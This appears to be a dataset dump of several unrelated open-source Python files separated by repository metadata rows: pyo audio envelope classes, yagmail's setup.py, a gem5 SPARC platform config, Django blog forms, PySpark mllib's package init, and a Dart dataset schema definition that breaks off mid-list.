SLMap(0, 5, 'lin', 'decay', self._decay, dataOnly=True),
SLMap(0, 1, 'lin', 'sustain', self._sustain, dataOnly=True),
SLMap(0, 10, 'lin', 'release', self._release, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def attack(self):
"""float. Duration of the attack phase in seconds."""
return self._attack
@attack.setter
def attack(self, x): self.setAttack(x)
@property
def decay(self):
"""float. Duration of the decay phase in seconds."""
return self._decay
@decay.setter
def decay(self, x): self.setDecay(x)
@property
def sustain(self):
"""float. Amplitude of the sustain phase."""
return self._sustain
@sustain.setter
def sustain(self, x): self.setSustain(x)
@property
def release(self):
"""float. Duration of the release phase in seconds."""
return self._release
@release.setter
def release(self, x): self.setRelease(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Linseg(PyoObject):
"""
Trace a series of line segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Linseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Linseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbbOO", list, loop, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
initToFirstVal, loop, mul, add, lmax = convertArgsToLists(initToFirstVal, loop, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Linseg_base(list, wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Linseg_base(wrap(list,i), wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
        When editing the grapher with the mouse, the new set of points
        will be sent to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
                maximum value is retrieved from the current list of points.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
                None, min and max are retrieved from the current list of points.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
if xlen == None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
if yrange == None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 0, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
class Expseg(PyoObject):
"""
Trace a series of exponential segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
exp : float, optional
Exponent factor. Used to control the slope of the curves.
Defaults to 10.
inverse : boolean, optional
If True, downward slope will be inversed. Useful to create
biexponential curves. Defaults to True.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Expseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Expseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, exp=10, inverse=True, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbnbbOO", list, loop, exp, inverse, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
self._exp = exp
self._inverse = inverse
loop, exp, inverse, initToFirstVal, mul, add, lmax = convertArgsToLists(loop, exp, inverse, initToFirstVal, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Expseg_base(list, wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Expseg_base(wrap(list,i), wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setExp(self, x):
"""
Replace the `exp` attribute.
:Args:
x : float
new `exp` attribute.
"""
pyoArgsAssert(self, "n", x)
self._exp = x
x, lmax = convertArgsToLists(x)
[obj.setExp(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setInverse(self, x):
"""
Replace the `inverse` attribute.
:Args:
x : boolean
new `inverse` attribute.
"""
pyoArgsAssert(self, "b", x)
self._inverse = x
x, lmax = convertArgsToLists(x)
[obj.setInverse(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
        When editing the grapher with the mouse, the new set of points
        will be sent to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
                maximum value is retrieved from the current list of points.
Defaults to None.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
                None, min and max are retrieved from the current list of points.
Defaults to None.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
if xlen == None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
if yrange == None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 2, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
@property
def exp(self):
"""float. Exponent factor."""
return self._exp
@exp.setter
def exp(self, x): self.setExp(x)
@property
def inverse(self):
"""boolean. Inverse downward slope."""
return self._inverse
@inverse.setter
def inverse(self, x): self.setInverse(x)
class SigTo(PyoObject):
"""
Convert numeric value to PyoObject signal with portamento.
When `value` is changed, a ramp is applied from the current
value to the new value. Can be used with PyoObject to apply
a linear portamento on an audio signal.
:Parent: :py:class:`PyoObject`
:Args:
value : float or PyoObject
Numerical value to convert.
time : float, optional
Ramp time, in seconds, to reach the new value. Defaults to 0.025.
init : float, optional
Initial value of the internal memory. Defaults to 0.
.. note::
The out() method is bypassed. SigTo's signal can not be sent to audio outs.
>>> import random
>>> s = Server().boot()
>>> s.start()
>>> fr = SigTo(value=200, time=0.5, init=200)
>>> a = SineLoop(freq=fr, feedback=0.08, mul=.3).out()
>>> b = SineLoop(freq=fr*1.005, feedback=0.08, mul=.3).out(1)
>>> def pick_new_freq():
... fr.value = random.randrange(200,501,50)
>>> pat = Pattern(function=pick_new_freq, time=1).play()
"""
def __init__(self, value, time=0.025, init=0.0, mul=1, add=0):
pyoArgsAssert(self, "OnnOO", value, time, init, mul, add)
PyoObject.__init__(self, mul, add)
self._value = value
self._time = time
value, time, init, mul ,add, lmax = convertArgsToLists(value, time, init, mul, add)
self._base_objs = [SigTo_base(wrap(value,i), wrap(time,i), wrap(init,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def setValue(self, x):
"""
Changes the value of the signal stream.
:Args:
x : float or PyoObject
Numerical value to convert.
"""
pyoArgsAssert(self, "O", x)
self._value = x
x, lmax = convertArgsToLists(x)
[obj.setValue(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setTime(self, x):
"""
Changes the ramp time of the object.
:Args:
x : float
New ramp time.
"""
pyoArgsAssert(self, "n", x)
self._time = x
x, lmax = convertArgsToLists(x)
[obj.setTime(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10, 'lin', 'time', self._time, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def value(self):
"""float or PyoObject. Numerical value to convert."""
return self._value
@value.setter
def value(self, x): self.setValue(x)
@property
def time(self):
"""float. Ramp time."""
return self._time
@time.setter
def time(self, x): self.setTime(x) | gpl-3.0 | 6,833,759,281,752,422,000 | 30.358682 | 172 | 0.567802 | false |
kootenpv/yagmail | setup.py | 1 | 2037 | from setuptools import setup
from setuptools import find_packages
with open('README.rst') as f:
LONG_DESCRIPTION = f.read()
MAJOR_VERSION = '0'
MINOR_VERSION = '14'
MICRO_VERSION = '247'
VERSION = "{}.{}.{}".format(MAJOR_VERSION, MINOR_VERSION, MICRO_VERSION)
setup(
name='yagmail',
version=VERSION,
description='Yet Another GMAIL client',
long_description=LONG_DESCRIPTION,
url='https://github.com/kootenpv/yagmail',
author='Pascal van Kooten',
author_email='kootenpv@gmail.com',
license='MIT',
extras_require={"all": ["keyring"]},
install_requires=["premailer"],
keywords='email mime automatic html attachment',
entry_points={'console_scripts': ['yagmail = yagmail.__main__:main']},
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Customer Service',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications :: Email',
'Topic :: Communications :: Email :: Email Clients (MUA)',
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Debuggers',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Software Distribution',
'Topic :: System :: Systems Administration',
'Topic :: Utilities',
],
packages=find_packages(),
zip_safe=False,
platforms='any',
)
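# The "all" extra declared above pulls in keyring, e.g. (hypothetical):
#
#   pip install yagmail[all]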
| mit | -5,868,926,427,037,378,000 | 36.722222 | 74 | 0.616593 | false |
jtyuan/racetrack | src/dev/sparc/T1000.py | 66 | 5810 | # Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.params import *
from m5.proxy import *
from Device import BasicPioDevice, PioDevice, IsaFake, BadAddr
from Platform import Platform
from Terminal import Terminal
from Uart import Uart8250
class MmDisk(BasicPioDevice):
type = 'MmDisk'
cxx_header = "dev/sparc/mm_disk.hh"
image = Param.DiskImage("Disk Image")
pio_addr = 0x1F40000000
class DumbTOD(BasicPioDevice):
type = 'DumbTOD'
cxx_header = "dev/sparc/dtod.hh"
time = Param.Time('01/01/2009', "System time to use ('Now' for real time)")
pio_addr = 0xfff0c1fff8
class Iob(PioDevice):
type = 'Iob'
cxx_header = "dev/sparc/iob.hh"
platform = Param.Platform(Parent.any, "Platform this device is part of.")
pio_latency = Param.Latency('1ns', "Programed IO latency")
class T1000(Platform):
type = 'T1000'
cxx_header = "dev/sparc/t1000.hh"
system = Param.System(Parent.any, "system")
fake_clk = IsaFake(pio_addr=0x9600000000, pio_size=0x100000000)
#warn_access="Accessing Clock Unit -- Unimplemented!")
fake_membnks = IsaFake(pio_addr=0x9700000000, pio_size=16384,
ret_data64=0x0000000000000000, update_data=False)
#warn_access="Accessing Memory Banks -- Unimplemented!")
fake_jbi = IsaFake(pio_addr=0x8000000000, pio_size=0x100000000)
#warn_access="Accessing JBI -- Unimplemented!")
fake_l2_1 = IsaFake(pio_addr=0xA900000000, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_2 = IsaFake(pio_addr=0xA900000040, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_3 = IsaFake(pio_addr=0xA900000080, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_4 = IsaFake(pio_addr=0xA9000000C0, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2esr_1 = IsaFake(pio_addr=0xAB00000000, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_2 = IsaFake(pio_addr=0xAB00000040, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_3 = IsaFake(pio_addr=0xAB00000080, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_4 = IsaFake(pio_addr=0xAB000000C0, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_ssi = IsaFake(pio_addr=0xff00000000, pio_size=0x10000000)
#warn_access="Accessing SSI -- Unimplemented!")
hterm = Terminal()
hvuart = Uart8250(pio_addr=0xfff0c2c000)
htod = DumbTOD()
pterm = Terminal()
puart0 = Uart8250(pio_addr=0x1f10000000)
iob = Iob()
# Attach I/O devices that are on chip
def attachOnChipIO(self, bus):
self.iob.pio = bus.master
self.htod.pio = bus.master
# Attach I/O devices to specified bus object. Can't do this
# earlier, since the bus object itself is typically defined at the
# System level.
def attachIO(self, bus):
self.hvuart.terminal = self.hterm
self.puart0.terminal = self.pterm
self.fake_clk.pio = bus.master
self.fake_membnks.pio = bus.master
self.fake_l2_1.pio = bus.master
self.fake_l2_2.pio = bus.master
self.fake_l2_3.pio = bus.master
self.fake_l2_4.pio = bus.master
self.fake_l2esr_1.pio = bus.master
self.fake_l2esr_2.pio = bus.master
self.fake_l2esr_3.pio = bus.master
self.fake_l2esr_4.pio = bus.master
self.fake_ssi.pio = bus.master
self.fake_jbi.pio = bus.master
self.puart0.pio = bus.master
self.hvuart.pio = bus.master
| bsd-3-clause | 7,878,468,195,683,676,000 | 40.798561 | 79 | 0.695525 | false |
NadaBayoumy/DjangoPythonBlog | Blog/BlogApp/forms.py | 1 | 2667 | #nada
from django import forms
from .models import Category
from .models import ForbiddenWords
from .models import Post
from django import forms
#end nada
#alem
from .models import Post, Reply
#end alem
#hossam
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
#end hossam
#simona
from django.forms.widgets import Widget
from django.contrib.auth.forms import UserCreationForm
#end simona
#nada
class CategoryForm(forms.ModelForm):
class Meta:
model=Category
fields=('categoryName',)
class ForbiddenWordsForm(forms.ModelForm):
class Meta:
model=ForbiddenWords
fields=('forbiddenWord',)
class PostForm(forms.ModelForm):
class Meta:
model=Post
fields=('postTitle','postPic','postContent','userID','postCategory')
#endnada
#alem
class Post_Form(forms.ModelForm):
class Meta:
model = Post
fields = ('postTitle', 'postPic', 'postContent')#'userID', 'postCategory')
class Comment_Form(forms.ModelForm):
class Meta:
model = Reply
fields = ('replyContent',)
#end alem
#hossam
class CreateUserForm(UserCreationForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', 'is_staff', 'is_active', 'is_superuser')
class EditUserForm(forms.ModelForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'is_staff', 'is_active', 'is_superuser')
class ChangePwForm(UserCreationForm):
username = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}), help_text="This is a disabled field.")
class Meta:
model = User
fields = ('username', 'password1', 'password2')
#end hossam
#simona
class RegistrationForm(UserCreationForm):
class Meta:
model =User
fields=['username','email','first_name','last_name','password1', 'password2']
def clean_email(self):
        clean_data = super(RegistrationForm, self).clean()
        email = clean_data.get('email')
        if User.objects.filter(email=email).count() > 0:
            raise forms.ValidationError("this email is already in use")
        return email
def clean_username(self):
clean_data = super(RegistrationForm, self).clean()
        name = clean_data.get('username')
return name
#end simona
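# Minimal sketch of exercising the registration form (hypothetical data):
#
#   form = RegistrationForm(data={
#       'username': 'demo', 'email': 'demo@example.com',
#       'first_name': 'De', 'last_name': 'Mo',
#       'password1': 's3cretpw!', 'password2': 's3cretpw!'})
#   form.is_valid()   # runs clean_email()/clean_username() defined above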
| gpl-2.0 | -7,744,843,897,878,007,000 | 20.336 | 132 | 0.620172 | false |
bravo-zhang/spark | python/pyspark/mllib/__init__.py | 123 | 1412 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RDD-based machine learning APIs for Python (in maintenance mode).
The `pyspark.mllib` package is in maintenance mode as of the Spark 2.0.0 release to encourage
migration to the DataFrame-based APIs under the `pyspark.ml` package.
"""
from __future__ import absolute_import
# MLlib currently needs NumPy 1.4+, so complain if lower
import numpy
ver = [int(x) for x in numpy.version.version.split('.')[:2]]
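# e.g. numpy.version.version == '1.16.4' yields ver == [1, 16]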
if ver < [1, 4]:
raise Exception("MLlib requires NumPy 1.4+")
__all__ = ['classification', 'clustering', 'feature', 'fpm', 'linalg', 'random',
'recommendation', 'regression', 'stat', 'tree', 'util']
| apache-2.0 | -8,250,000,166,014,086,000 | 39.342857 | 93 | 0.735127 | false |
RetailMeNotSandbox/dart | src/python/dart/client/python/examples/datasets/owen_outclick_us_v02.py | 1 | 14227 | from dart.client.python.dart_client import Dart
from dart.model.dataset import Column, DatasetData, Dataset, DataFormat, FileFormat, RowFormat, DataType, Compression, \
LoadType
if __name__ == '__main__':
dart = Dart('localhost', 5000)
assert isinstance(dart, Dart)
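    # save_dataset registers the dataset definition below with the Dart API
    # client above; each Column's `path` maps a field in the raw JSON records
    # to a table column (e.g. 'owen.context.city' -> city).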
dataset = dart.save_dataset(Dataset(data=(DatasetData(
name='owen_outclick_us_v02',
description='Owen outclick data, based on overlord schema version. Considered a replacement for outclick events.',
table_name='outclick',
location='s3://example-bucket/prd/inbound/overlord/raw-firehose-02/rmn-outclicks',
load_type=LoadType.MERGE,
data_format=DataFormat(
file_format=FileFormat.TEXTFILE,
row_format=RowFormat.JSON,
),
compression=Compression.GZIP,
partitions=[
Column('year', DataType.STRING),
Column('month', DataType.STRING),
Column('day', DataType.STRING),
],
primary_keys=['eventInstanceUuid'],
merge_keys=['eventInstanceUuid'],
sort_keys=['eventTimestamp', 'eventInstanceUuid', 'derivedEventInstanceId'],
distribution_keys=['eventInstanceUuid'],
batch_merge_sort_keys=['owenProcessed DESC'],
columns=[
Column('advertiserUuid', DataType.VARCHAR, length=2048, path='owen.context.advertiserUuid'),
Column('appBadgeCount', DataType.INT, path='owen.context.appBadgeCount'),
Column('appForegroundFlag', DataType.BOOLEAN, path='owen.context.appForegroundFlag'),
Column('bluetoothBeaconId', DataType.VARCHAR, length=50, path='owen.context.bluetoothBeaconId'),
Column('bluetoothBeaconType', DataType.VARCHAR, length=25, path='owen.context.bluetoothBeaconType'),
Column('bluetoothEnabledFlag', DataType.BOOLEAN, path='owen.context.bluetoothEnabledFlag'),
Column('breadCrumb', DataType.VARCHAR, length=2048, path='owen.context.breadCrumb'),
Column('browserFamily', DataType.VARCHAR, length=50, path='owen.context.browserFamily'),
Column('browserVersion', DataType.VARCHAR, length=50, path='owen.context.browserVersion'),
Column('carrier', DataType.VARCHAR, length=25, path='owen.context.carrier'),
Column('city', DataType.VARCHAR, length=75, path='owen.context.city'),
Column('connectionType', DataType.VARCHAR, length=25, path='owen.context.connectionType'),
Column('country', DataType.VARCHAR, length=2, path='owen.context.country'),
Column('custom', DataType.VARCHAR, path='owen.context.custom'),
Column('deviceCategory', DataType.VARCHAR, length=2048, path='owen.context.deviceCategory'),
Column('deviceFingerprint', DataType.VARCHAR, length=26, path='owen.context.deviceFingerprint'),
Column('dma', DataType.INT, path='owen.context.dma'),
Column('environment', DataType.VARCHAR, length=2048, path='owen.context.environment'),
Column('experimentObject', DataType.VARCHAR, length=1024, path='owen.context.experiment'),
Column('failureFlag', DataType.BOOLEAN, path='owen.context.failureFlag'),
Column('failureReason', DataType.VARCHAR, length=2048, path='owen.context.failureReason'),
Column('favoriteFlag', DataType.BOOLEAN, path='owen.context.favoriteFlag'),
Column('featureFlags', DataType.VARCHAR, path='owen.context.featureFlags'),
Column('geofenceUuid', DataType.VARCHAR, length=2048, path='owen.context.geofenceUuid'),
Column('inventoryCount', DataType.INT, path='owen.context.inventoryCount'),
Column('inventory_affiliateNetwork', DataType.VARCHAR, length=50, path='owen.context.inventory[0].affiliateNetwork'),
Column('inventory_brand', DataType.VARCHAR, length=100, path='owen.context.inventory[0].brand'),
Column('inventory_claimUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].claimUuid'),
Column('inventory_clickLocation', DataType.VARCHAR, length=100, path='owen.context.inventory[0].clickLocation'),
Column('inventory_commentsCount', DataType.INT, path='owen.context.inventory[0].commentsCount'),
Column('inventory_conquestingFlag', DataType.BOOLEAN, path='owen.context.inventory[0].conquestingFlag'),
Column('inventory_couponRank', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].couponRank'),
Column('inventory_deepLinkUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrl'),
Column('inventory_deepLinkUrlScheme', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrlScheme'),
Column('inventory_exclusivityFlag', DataType.BOOLEAN, path='owen.context.inventory[0].exclusivityFlag'),
Column('inventory_expirationDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].expirationDate'),
Column('inventory_finalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].finalPrice'),
Column('inventory_instoreType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].instoreType'),
Column('inventory_inventoryChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryChannel'),
Column('inventory_inventoryName', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryName'),
Column('inventory_inventorySource', DataType.VARCHAR, length=50, path='owen.context.inventory[0].inventorySource'),
Column('inventory_inventoryType', DataType.VARCHAR, length=25, path='owen.context.inventory[0].inventoryType'),
Column('inventory_inventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryUuid'),
Column('inventory_lastVerifiedDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].lastVerifiedDate'),
Column('inventory_monetizableFlag', DataType.BOOLEAN, path='owen.context.inventory[0].monetizableFlag'),
Column('inventory_noVotes', DataType.INT, path='owen.context.inventory[0].noVotes'),
Column('inventory_onlineType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].onlineType'),
Column('inventory_originalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].originalPrice'),
Column('inventory_outRedirectUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outRedirectUrl'),
Column('inventory_outclickUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outclickUuid'),
Column('inventory_parentInventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].parentInventoryUuid'),
Column('inventory_personalizationFlag', DataType.BOOLEAN, path='owen.context.inventory[0].personalizationFlag'),
Column('inventory_position', DataType.INT, path='owen.context.inventory[0].position'),
Column('inventory_proximity', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].proximity'),
Column('inventory_proximityUnit', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].proximityUnit'),
Column('inventory_recommendedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].recommendedFlag'),
Column('inventory_redemptionChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].redemptionChannel'),
Column('inventory_retailCategory', DataType.VARCHAR, length=75, path='owen.context.inventory[0].retailCategory'),
Column('inventory_savedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].savedFlag'),
Column('inventory_siteUuid', DataType.VARCHAR, length=26, path='owen.context.inventory[0].siteUuid'),
Column('inventory_startDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].startDate'),
Column('inventory_successPercentage', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].successPercentage'),
Column('inventory_usedByCount', DataType.INT, path='owen.context.inventory[0].usedByCount'),
Column('inventory_yesVotes', DataType.INT, path='owen.context.inventory[0].yesVotes'),
Column('ipAddress', DataType.VARCHAR, length=45, path='owen.context.ipAddress'),
Column('language', DataType.VARCHAR, length=6, path='owen.context.language'),
Column('latitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.latitude'),
Column('locationEnabledFlag', DataType.BOOLEAN, path='owen.context.locationEnabledFlag'),
Column('loggedInFlag', DataType.BOOLEAN, path='owen.context.loggedInFlag'),
Column('longitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.longitude'),
Column('macAddress', DataType.VARCHAR, length=2048, path='owen.context.macAddress'),
Column('marketing_adGroup', DataType.VARCHAR, length=2048, path='owen.context.marketing.adGroup'),
Column('marketing_campaign', DataType.VARCHAR, length=50, path='owen.context.marketing.campaign'),
Column('marketing_campaignSendCount', DataType.INT, path='owen.context.marketing.campaignSendCount'),
